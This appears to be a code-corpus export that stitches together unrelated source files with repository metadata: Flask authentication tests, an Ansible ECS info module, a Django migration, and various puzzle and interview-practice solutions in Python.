    assert response.content_type == "application/json"
    assert "justatest" in body["username"]
    assert "test@test.com" in body["email"]
    assert "password" not in body
def test_user_registration_duplicate_email(test_app, test_database, add_user):
    """Registering with an already-used email is rejected with 400."""
    add_user("test", "test@test.com", "test")
    payload = {"username": "michael", "email": "test@test.com", "password": "test"}
    response = test_app.test_client().post(
        "/auth/register",
        data=json.dumps(payload),
        content_type="application/json",
    )
    body = json.loads(response.data.decode())
    assert response.status_code == 400
    assert response.content_type == "application/json"
    assert "Sorry. That email already exists." in body["message"]
@pytest.mark.parametrize(
    "payload",
    [
        {},
        {"email": "me@testdriven.io", "password": "greaterthanten"},
        {"username": "michael", "password": "greaterthanten"},
        {"email": "me@testdriven.io", "username": "michael"},
    ],
)
def test_user_registration_invalid_json(test_app, test_database, payload):
    """Payloads missing any required field fail schema validation with 400."""
    response = test_app.test_client().post(
        "/auth/register",
        data=json.dumps(payload),
        content_type="application/json",
    )
    body = json.loads(response.data.decode())
    assert response.status_code == 400
    assert response.content_type == "application/json"
    assert "Input payload validation failed" in body["message"]
def test_registered_user_login(test_app, test_database, add_user):
    """A known user logging in receives both an access and a refresh token."""
    add_user("test3", "test3@test.com", "test")
    response = test_app.test_client().post(
        "/auth/login",
        data=json.dumps({"email": "test3@test.com", "password": "test"}),
        content_type="application/json",
    )
    body = json.loads(response.data.decode())
    assert response.status_code == 200
    assert response.content_type == "application/json"
    assert body["access_token"]
    assert body["refresh_token"]
def test_not_registered_user_login(test_app, test_database):
    """Logging in with an unknown email yields 404."""
    response = test_app.test_client().post(
        "/auth/login",
        data=json.dumps({"email": "testnotreal@test.com", "password": "test"}),
        content_type="application/json",
    )
    body = json.loads(response.data.decode())
    assert response.status_code == 404
    assert response.content_type == "application/json"
    assert "User does not exist." in body["message"]
def test_valid_refresh(test_app, test_database, add_user):
    """A refresh token from a fresh login can be exchanged for new tokens."""
    add_user("test4", "test4@test.com", "test")
    client = test_app.test_client()

    # Log in to obtain a refresh token.
    login_response = client.post(
        "/auth/login",
        data=json.dumps({"email": "test4@test.com", "password": "test"}),
        content_type="application/json",
    )
    refresh_token = json.loads(login_response.data.decode())["refresh_token"]

    # Exchange it for a fresh token pair.
    response = client.post(
        "/auth/refresh",
        data=json.dumps({"refresh_token": refresh_token}),
        content_type="application/json",
    )
    body = json.loads(response.data.decode())
    assert response.status_code == 200
    assert response.content_type == "application/json"
    assert body["access_token"]
    assert body["refresh_token"]
    assert response.content_type == "application/json"
def test_invalid_refresh_expired_token(test_app, test_database, add_user):
    """An expired refresh token is rejected with 401."""
    add_user("test5", "test5@test.com", "test")
    # Force immediate expiry so the freshly issued refresh token is stale.
    current_app.config["REFRESH_TOKEN_EXPIRATION"] = -1
    client = test_app.test_client()

    login_response = client.post(
        "/auth/login",
        data=json.dumps({"email": "test5@test.com", "password": "test"}),
        content_type="application/json",
    )
    refresh_token = json.loads(login_response.data.decode())["refresh_token"]

    response = client.post(
        "/auth/refresh",
        data=json.dumps({"refresh_token": refresh_token}),
        content_type="application/json",
    )
    body = json.loads(response.data.decode())
    assert response.status_code == 401
    assert response.content_type == "application/json"
    assert "Signature expired. Please log in again." in body["message"]
def test_invalid_refresh(test_app, test_database):
    """A malformed refresh token is rejected with 401."""
    response = test_app.test_client().post(
        "/auth/refresh",
        data=json.dumps({"refresh_token": "Invalid"}),
        content_type="application/json",
    )
    body = json.loads(response.data.decode())
    assert response.status_code == 401
    assert response.content_type == "application/json"
    assert "Invalid token. Please log in again." in body["message"]
def test_user_status(test_app, test_database, add_user):
    """A valid bearer token on /auth/status returns the caller's profile."""
    add_user("test6", "test6@test.com", "test")
    client = test_app.test_client()

    login_response = client.post(
        "/auth/login",
        data=json.dumps({"email": "test6@test.com", "password": "test"}),
        content_type="application/json",
    )
    token = json.loads(login_response.data.decode())["access_token"]

    response = client.get(
        "/auth/status",
        headers={"Authorization": f"Bearer {token}"},
        content_type="application/json",
    )
    body = json.loads(response.data.decode())
    assert response.status_code == 200
    assert response.content_type == "application/json"
    assert "test6" in body["username"]
    assert "test6@test.com" in body["email"]
    assert "password" not in body
def test_invalid_status(test_app, test_database):
    """A malformed bearer token on /auth/status is rejected with 401."""
    response = test_app.test_client().get(
        "/auth/status",
        headers={"Authorization": "Bearer invalid"},
        content_type="application/json",
    )
    body = json.loads(response.data.decode())
    assert response.status_code == 401
    assert response.content_type == "application/json"
    assert "Invalid token. Please log in again." in body["message"]
| [
"hermanmu@gmail.com"
] | hermanmu@gmail.com |
# Reads n and a list of n integers, enumerates the sums of all contiguous
# sub-arrays, and finally prints how many of those sums are even.
# NOTE(review): the intermediate print() calls look like debugging output
# left in -- confirm whether the judged output is only the final count.
n=int(input())
x=input()
a=x.split()
for i in range(0,n):
    a[i]=int(a[i])
print(a)
d=[]
# For each start index i, `counter` shrinks the window's right edge one step
# per outer pass, so the windows are [i, n), [i, n-1), ..., [i, i+1) -- every
# sub-array starting at i. Each sum is recomputed from scratch: O(n^3).
for i in range(0,n):
    counter=n
    for j in range(i,n):
        summ=0
        for k in range(i,counter):
            print(a[k],end=' ')
            summ=summ+a[k]
        counter-=1
        print()
        print(summ)
        d.append(summ)
print()
print()
print(d)
gg=0
# Count the even sub-array sums.
for i in range(0,len(d)):
    if d[i]%2==0:
        gg+=1
print(gg)
| [
"wimpywarlord@gmail.com"
] | wimpywarlord@gmail.com |
e3a9971a7c467b2a337cc7609361518a273549cb | dd8363acd9a028d9b6432936d72e7a5344077c20 | /plugins/modules/ecs_taskdefinition_info.py | 1ca9c29f56917c329488e57cc8ec275d3183b503 | [] | no_license | gundalow-collections/amazon | 5d437c41af5e3cfa73731c9cd2c08b66c7480b43 | 23c743b63f58ba97960479e230b462fb1c90cc95 | refs/heads/master | 2020-08-28T04:53:02.641829 | 2019-10-25T19:40:04 | 2019-10-25T19:40:04 | 217,595,855 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,417 | py | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''author:
- Gustavo Maia (@gurumaia)
- Mark Chance (@Java1Guy)
- Darek Kaczynski (@kaczynskid)
description:
- Describes a task definition in ecs.
extends_documentation_fragment:
- ansible.amazon.aws
- ansible.amazon.ec2
module: ecs_taskdefinition_info
notes:
- for details of the parameters and returns see U(http://boto3.readthedocs.io/en/latest/reference/services/ecs.html#ECS.Client.describe_task_definition)
- This module was called C(ecs_taskdefinition_facts) before Ansible 2.9. The usage
did not change.
options:
task_definition:
description:
- The name of the task definition to get details for
required: true
requirements:
- json
- botocore
- boto3
short_description: describe a task definition in ecs
version_added: '2.5'
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- ecs_taskdefinition_info:
task_definition: test-td
'''
RETURN = '''
container_definitions:
description: Returns a list of complex objects representing the containers
returned: success
type: complex
contains:
name:
description: The name of a container.
returned: always
type: str
image:
description: The image used to start a container.
returned: always
type: str
cpu:
description: The number of cpu units reserved for the container.
returned: always
type: int
memoryReservation:
description: The soft limit (in MiB) of memory to reserve for the container.
returned: when present
type: int
links:
description: Links to other containers.
returned: when present
type: str
portMappings:
description: The list of port mappings for the container.
returned: always
type: complex
contains:
containerPort:
description: The port number on the container.
returned: when present
type: int
hostPort:
description: The port number on the container instance to reserve for your container.
returned: when present
type: int
protocol:
description: The protocol used for the port mapping.
returned: when present
type: str
essential:
description: Whether this is an essential container or not.
returned: always
type: bool
entryPoint:
description: The entry point that is passed to the container.
returned: when present
type: str
command:
description: The command that is passed to the container.
returned: when present
type: str
environment:
description: The environment variables to pass to a container.
returned: always
type: complex
contains:
name:
description: The name of the environment variable.
returned: when present
type: str
value:
description: The value of the environment variable.
returned: when present
type: str
mountPoints:
description: The mount points for data volumes in your container.
returned: always
type: complex
contains:
sourceVolume:
description: The name of the volume to mount.
returned: when present
type: str
containerPath:
description: The path on the container to mount the host volume at.
returned: when present
type: str
readOnly:
description: If this value is true , the container has read-only access to the volume.
If this value is false , then the container can write to the volume.
returned: when present
type: bool
volumesFrom:
description: Data volumes to mount from another container.
returned: always
type: complex
contains:
sourceContainer:
description: The name of another container within the same task definition to mount volumes from.
returned: when present
type: str
readOnly:
description: If this value is true , the container has read-only access to the volume.
If this value is false , then the container can write to the volume.
returned: when present
type: bool
hostname:
description: The hostname to use for your container.
returned: when present
type: str
user:
description: The user name to use inside the container.
returned: when present
type: str
workingDirectory:
description: The working directory in which to run commands inside the container.
returned: when present
type: str
disableNetworking:
description: When this parameter is true, networking is disabled within the container.
returned: when present
type: bool
privileged:
description: When this parameter is true, the container is given elevated
privileges on the host container instance (similar to the root user).
returned: when present
type: bool
readonlyRootFilesystem:
description: When this parameter is true, the container is given read-only access to its root file system.
returned: when present
type: bool
dnsServers:
description: A list of DNS servers that are presented to the container.
returned: when present
type: str
dnsSearchDomains:
description: A list of DNS search domains that are presented to the container.
returned: when present
type: str
extraHosts:
description: A list of hostnames and IP address mappings to append to the /etc/hosts file on the container.
returned: when present
type: complex
contains:
hostname:
description: The hostname to use in the /etc/hosts entry.
returned: when present
type: str
ipAddress:
description: The IP address to use in the /etc/hosts entry.
returned: when present
type: str
dockerSecurityOptions:
description: A list of strings to provide custom labels for SELinux and AppArmor multi-level security systems.
returned: when present
type: str
dockerLabels:
description: A key/value map of labels to add to the container.
returned: when present
type: str
ulimits:
description: A list of ulimits to set in the container.
returned: when present
type: complex
contains:
name:
description: The type of the ulimit .
returned: when present
type: str
softLimit:
description: The soft limit for the ulimit type.
returned: when present
type: int
hardLimit:
description: The hard limit for the ulimit type.
returned: when present
type: int
logConfiguration:
description: The log configuration specification for the container.
returned: when present
type: str
options:
description: The configuration options to send to the log driver.
returned: when present
type: str
family:
description: The family of your task definition, used as the definition name
returned: always
type: str
task_definition_arn:
description: ARN of the task definition
returned: always
type: str
task_role_arn:
description: The ARN of the IAM role that containers in this task can assume
returned: when role is set
type: str
network_mode:
description: Network mode for the containers
returned: always
type: str
revision:
description: Revision number that was queried
returned: always
type: int
volumes:
description: The list of volumes in a task
returned: always
type: complex
contains:
name:
description: The name of the volume.
returned: when present
type: str
host:
description: The contents of the host parameter determine whether your data volume
persists on the host container instance and where it is stored.
returned: when present
type: bool
source_path:
description: The path on the host container instance that is presented to the container.
returned: when present
type: str
status:
description: The status of the task definition
returned: always
type: str
requires_attributes:
description: The container instance attributes required by your task
returned: when present
type: complex
contains:
name:
description: The name of the attribute.
returned: when present
type: str
value:
description: The value of the attribute.
returned: when present
type: str
targetType:
description: The type of the target with which to attach the attribute.
returned: when present
type: str
targetId:
description: The ID of the target.
returned: when present
type: str
placement_constraints:
description: A list of placement constraint objects to use for tasks
returned: always
type: complex
contains:
type:
description: The type of constraint.
returned: when present
type: str
expression:
description: A cluster query language expression to apply to the constraint.
returned: when present
type: str
'''
from ansible_collections.ansible.amazon.plugins.module_utils.aws.core import AnsibleAWSModule
from ansible_collections.ansible.amazon.plugins.module_utils.ec2 import camel_dict_to_snake_dict, boto3_conn, ec2_argument_spec, get_aws_connection_info
try:
import botocore
except ImportError:
pass # will be detected by imported AnsibleAWSModule
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
task_definition=dict(required=True, type='str')
))
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=True)
if module._name == 'ecs_taskdefinition_facts':
module.deprecate("The 'ecs_taskdefinition_facts' module has been renamed to 'ecs_taskdefinition_info'", version='2.13')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
ecs = boto3_conn(module, conn_type='client', resource='ecs',
region=region, endpoint=ec2_url, **aws_connect_kwargs)
try:
ecs_td = ecs.describe_task_definition(taskDefinition=module.params['task_definition'])['taskDefinition']
except botocore.exceptions.ClientError:
ecs_td = {}
module.exit_json(changed=False, **camel_dict_to_snake_dict(ecs_td))
if __name__ == '__main__':
main()
| [
"brian.coca+git@gmail.com"
] | brian.coca+git@gmail.com |
e550a7da4602d02bd9ec286325f5bf90fb73f176 | 5c3d487c1f48e33c507a8aca1c2fc178cf95e17f | /interview/leet/004_2lists_median.py | 90e07fac5e0013b8cd475c180434cbb20983d40b | [
"MIT"
] | permissive | eroicaleo/LearningPython | 52f9bcda796ea8fcc40a2971f30102d2847c93a4 | ebebd1104b1947324fbaae304b44465f80803c8b | refs/heads/master | 2023-07-20T04:34:51.465451 | 2023-07-13T06:43:31 | 2023-07-13T06:43:31 | 14,948,231 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,043 | py | #!/usr/bin/env python
def process_lists(l1, l2, k):
# k is a index in range(0, k)
l1_lo, l1_hi, l2_lo, l2_hi = 0, len(l1)-1, 0, len(l2)-1
while True:
# break condition 2, lo > hi
if l1_hi < l1_lo:
print('crossing l1_lo: %d, l1_hi: %d.' % (l1_lo, l1_hi))
return l2[l2_lo+k]
if l2_hi < l2_lo:
print('crossing l2_lo: %d, l2_hi: %d.' % (l2_lo, l2_hi))
return l1[l1_lo+k]
print('#' * 80)
print("Initial: l1_lo: %d, l1_hi: %d, l2_lo: %d, l2_hi: %d" % (l1_lo, l1_hi, l2_lo, l2_hi))
print('looking for No. %d element in %s and %s' % (k, l1[l1_lo:l1_hi+1], l2[l2_lo:l2_hi+1]))
# After these two steps, l1 and l2 are at most length k-1
# Index k more close to 0 or len(l1) + len(l2) ?
j = (l1_hi-l1_lo+1) + (l2_hi-l2_lo+1) - 1 - k
if k <= j:
l1_hi = min(l1_hi, l1_lo+k)
l2_hi = min(l2_hi, l2_lo+k)
else:
l1_lo = max(l1_lo, l1_hi-j)
l2_lo = max(l2_lo, l2_hi-j)
print("Reduce length: l1_lo: %d, l1_hi: %d, l2_lo: %d, l2_hi: %d" % (l1_lo, l1_hi, l2_lo, l2_hi))
print('looking for the element in %s and %s' % (l1[l1_lo:l1_hi+1], l2[l2_lo:l2_hi+1]))
# temination condition:
if k == 0:
print('k = %d' % k)
return min(l1[l1_lo], l2[l2_lo])
if j == 0:
print('j = %d' % j)
return max(l1[l1_hi], l2[l2_hi])
if k <= j:
# Remove k/2 element
move = int((k-1)/2)
l1_mi, l2_mi = [l + move for l in [l1_lo, l2_lo]]
# they cann't be bigger than l?_hi
l1_mi, l2_mi = min(l1_mi, l1_hi), min(l2_mi, l2_hi)
print("l1[l1_mi] : %d, l2[l2_mi] : %d" % (l1[l1_mi], l2[l2_mi]))
if l1[l1_mi] <= l2[l2_mi]:
real_move = min(l1_hi+1, l1_lo+move+1) - l1_lo
l1_lo += real_move
else:
real_move = min(l2_hi+1, l2_lo+move+1) - l2_lo
l2_lo += real_move
k -= real_move
else:
# Remove j/2 element
move = int((j-1)/2)
l1_mi, l2_mi = [l - move for l in [l1_hi, l2_hi]]
# they cann't be smaller than l?_lo
l1_mi, l2_mi = max(l1_mi, l1_lo), max(l2_mi, l2_lo)
print("l1[l1_mi] : %d, l2[l2_mi] : %d" % (l1[l1_mi], l2[l2_mi]))
if l1[l1_mi] >= l2[l2_mi]:
real_move = l1_hi - max(l1_lo-1, l1_hi-move-1)
l1_hi -= real_move
else:
real_move = l2_hi - max(l2_lo-1, l2_hi-move-1)
l2_hi -= real_move
k = (l1_hi-l1_lo+1) + (l2_hi-l2_lo+1) - 1 - (j-real_move)
print("Remove k/2 elements: l1_lo: %d, l1_hi: %d, l2_lo: %d, l2_hi: %d" % (l1_lo, l1_hi, l2_lo, l2_hi))
print('looking for No. %d element in %s and %s' % (k, l1[l1_lo:l1_hi+1], l2[l2_lo:l2_hi+1]))
# break condition 2, lo > hi
if l1_hi < l1_lo:
print('crossing l1_lo: %d, l1_hi: %d.' % (l1_lo, l1_hi))
return l2[l2_lo+k]
if l2_hi < l2_lo:
print('crossing l2_lo: %d, l2_hi: %d.' % (l2_lo, l2_hi))
return l1[l1_lo+k]
if __name__ == '__main__':
# l1 = [1, 2, 3]
# l2 = [4, 5, 6]
# for i in range(0, len(l1+l2)):
# print('## Iteration i = %d' % i)
# print(process_lists(l1, l2, i))
# l1 = list(range(1, 9, 2))
# l2 = list(range(2, 10, 2))
# for i in range(len(l1+l2)):
# print('## Iteration i = %d' % i)
# print(process_lists(l1, l2, i))
# l1 = [7]
# l2 = list(range(0, 7)) + list(range(8, 16))
# for i in range(len(l1+l2)):
# print('## Iteration i = %d' % i)
# print(process_lists(l1, l2, i))
l1 = [1]
l2 = [2, 3, 4, 5, 6, 7]
l = (len(l1) + len(l2)) // 2
print(process_lists(l1, l2, l))
l1 = [2,3,5,6,8,9]
l2 = [1,4,7]
l = (len(l1) + len(l2)) // 2
print(process_lists(l1, l2, l))
| [
"eroicaleo@gmail.com"
] | eroicaleo@gmail.com |
d947f066692c5b74bac324ac407eae75542cdea9 | b5b31b22604b069a1dbf96a1968675185834b4b2 | /backend/ireach_22272/wsgi.py | 2c6bd9068288e1621f2aae90cfbe6ff9257fdcba | [] | no_license | crowdbotics-apps/ireach-22272 | 1a1c140d61fecd088684c1fe2e9022e9227e1f09 | 5ed17eeefd1d25d0d31d98a98ba1309c295353e5 | refs/heads/master | 2023-01-09T20:15:26.480421 | 2020-11-03T21:21:15 | 2020-11-03T21:21:15 | 309,809,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for ireach_22272 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ireach_22272.settings')
application = get_wsgi_application()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
469482f8e69ff66760208ab38b9533fd5b051aad | 945c6df0d8c129b5ffc3c2bcbadbfe1d6e5608d5 | /Bela/bela.py | e99040a8892ec52d6350f752428ab6a589a365ba | [] | no_license | jb1361/kattis | a93236db5c8c2d5660bf9acc6385db61854f9ff6 | c5245124a18a465b4ea50b11228033fae1c65775 | refs/heads/master | 2018-11-29T23:40:22.853840 | 2018-09-05T15:39:33 | 2018-09-05T15:39:33 | 94,928,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | dominant = [['A',11],['K',4],['Q',3],['J',20],['T',10],['9',14],['8',0],['7',0]]
notdominant = [['A',11],['K',4],['Q',3],['J',2],['T',10],['9',0],['8',0],['7',0]]
inp = input()
inp = inp.split()
hands = int(inp[0]) * 4
domHand = inp[1]
card_data = []
i = 0
while i < hands:
temp = input()
card_data.append(temp)
i += 1
points = 0
def calc_points(card, suit):
if suit == domHand:
tempp = 0
for i in dominant:
if i[0] == card:
return int(i[1])
else:
for i in notdominant:
if i[0] == card:
return int(i[1])
for i in card_data:
points += calc_points(i[0],i[1])
print(points) | [
"justinbutler4@hotmail.com"
] | justinbutler4@hotmail.com |
638b967383833a626bf654f60c58a3690a7a5a47 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02911/s816534461.py | 13c30ef108655a3fe436359c3a523f096f0a221c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | n, k, q = map(int, input().split())
a = [int(input()) for i in range(q)]
l = [k-q] * n
for i in a:
l[i-1] += 1
for f in l:
if f <= 0:
print("No")
else:
print("Yes") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
078aac1497450963b1b2d31e8579a5c45914908d | 56b63ee537f872af0fc028016d1508b4c1dd5c60 | /school/migrations/0069_cloan_deposit.py | fe3ae552699145c8ebafd5e53de70ecfa7fb258e | [] | no_license | jacknjillsolutionsrevanth/EMS1 | 01fc571120f765b0fbfe3aa654b15ff578d6e9b9 | db14d8e6c15669b5938aa9276c5e22006218814a | refs/heads/main | 2023-08-03T19:40:50.073133 | 2021-10-01T07:02:37 | 2021-10-01T07:02:37 | 410,202,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,364 | py | # Generated by Django 3.1.2 on 2020-11-02 05:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('school', '0068_center_ifsc'),
]
operations = [
migrations.CreateModel(
name='Cloan',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('loan_type', models.CharField(blank=True, max_length=255, null=True)),
('date', models.DateField(blank=True, null=True)),
('transaction_type', models.CharField(blank=True, max_length=255, null=True)),
('center', models.CharField(blank=True, max_length=255, null=True)),
('loan_no', models.CharField(blank=True, max_length=255, null=True)),
('loan_date', models.DateField(blank=True, null=True)),
('principal_amt', models.IntegerField(blank=True, null=True)),
('interest_rate', models.FloatField(default=0.0)),
('flat_deminished', models.CharField(blank=True, max_length=255, null=True)),
('loan_duration', models.IntegerField(blank=True, null=True)),
('interest_amt', models.FloatField(default=0.0)),
('noofinstallments', models.IntegerField(blank=True, null=True)),
('installment_amt', models.IntegerField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Deposit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(blank=True, null=True)),
('issuedto', models.CharField(blank=True, max_length=255, null=True)),
('center', models.CharField(blank=True, max_length=255, null=True)),
('transporter', models.CharField(blank=True, max_length=255, null=True)),
('modeofreturn', models.CharField(blank=True, max_length=255, null=True)),
('amount', models.FloatField(default=0.0)),
('remarks', models.CharField(blank=True, max_length=255, null=True)),
('closingdate', models.CharField(blank=True, max_length=255, null=True)),
],
),
]
| [
"jacknjillsolutions.revanth@gmail.com"
] | jacknjillsolutions.revanth@gmail.com |
84d15772355558872edd5fbf0f1bde46367a3a78 | e35fd52fe4367320024a26f2ee357755b5d5f4bd | /leetcode/p0953 - Verifying an Alien Dictionary.py | ef9f41b49f256cc3e3d21bf400d9105f0bd05618 | [] | no_license | liseyko/CtCI | a451967b0a0ce108c491d30b81e88d20ad84d2cd | c27f19fac14b4acef8c631ad5569e1a5c29e9e1f | refs/heads/master | 2020-03-21T14:28:47.621481 | 2019-11-12T22:59:07 | 2019-11-12T22:59:07 | 138,658,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | class Solution:
def isAlienSorted(self, words: List[str], order: str) -> bool:
order = {c: i for i, c in enumerate(order)}
for i in range(1, len(words)):
w1, w2 = words[i-1], words[i]
for i in range(max(len(w1), len(w2))):
if i == len(w1):
return True
if i == len(w2) or order[w1[i]] > order[w2[i]]:
return False
elif order[w1[i]] < order[w2[i]]:
break
return True
def isAlienSorted(self, words, order):
order = {c: i for i, c in enumerate(order)}
nwords = [[order[c] for c in w] for w in words]
return all(w1 <= w2 for w1, w2 in zip(nwords, nwords[1:]))
| [
"liseyko@gmail.com"
] | liseyko@gmail.com |
82ab39e1ff512816b925a6c5a98b421d60a96b99 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/429/usersdata/314/106483/submittedfiles/jogoDaVelha.py | 90530203e54e5e7d61182079f64593ac3dba01f6 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,835 | py | from jogoDaVelha_BIB import *
tabuleiro = [ [' ',' ',' '], [' ',' ',' '], [' ',' ',' '] ] #Tabuleiro vazio
grupo = 'H [Breendon, Gustavo, Roberto, Rafael]' #Nome dos integrantes do grupo
jogador = ['',''] #Nome do jogador e simbolo
computador = ['Computador',''] #Computador e simbolo
bemVindo(grupo)
while True:
tabuleiro = [ [' ',' ',' '], [' ',' ',' '], [' ',' ',' '] ]
jogador[0] = input('Qual o seu nome (ou apelido)? ')
jogador[1], computador[1] = solicitaSimboloDoHumano()
turno = sorteioPrimeiraJogada(jogador[0])
movimentos = 0
print('Vencedor do sorteio para início do jogo: {}' .format(turno))
while True :
if turno == computador[0] :
tabuleiro = jogadaComputador(tabuleiro, computador[1])
movimentos += 1
acabou = verificaVencedor(tabuleiro, computador, movimentos)
if acabou :
break
turno = jogador[0]
else :
while True :
jogada = input('Qual a sua jogada, {}? ' .format(jogador[0]))
jogadaValida = validaJogada(tabuleiro, jogada)
if not jogadaValida :
print('OPS!!! Essa jogada não está disponível. Tente novamente!')
else :
tabuleiro = jogadaHumana(tabuleiro, jogador[1], jogada)
movimentos += 1
acabou = verificaVencedor(tabuleiro, jogador, movimentos)
turno = computador[0]
break
if acabou :
break
continua = input('Deseja jogar novamente? ').upper()
if not continua=='S':
break
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
5701ca5a24ad422a24d1e85ccc647845822be9d9 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03167/s908459155.py | 5f856077bed000e7aa3d84fcde080fe3df6829a2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | H, W = map(int, input().split())
a = []
for _ in range(H):
a.append(input())
dp = [[0]*W for _ in range(H)]
dp[0][0] = 1
for i in range(H):
for j in range(W):
if a[i][j] == '#':
continue
if i + 1 < H and a[i+1][j] == '.':
dp[i+1][j] += dp[i][j]
dp[i+1][j] %= 1e9 + 7
if j + 1 < W and a[i][j+1] == '.':
dp[i][j+1] += dp[i][j]
dp[i][j+1] %= 1e9 + 7
print(int(dp[-1][-1])) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.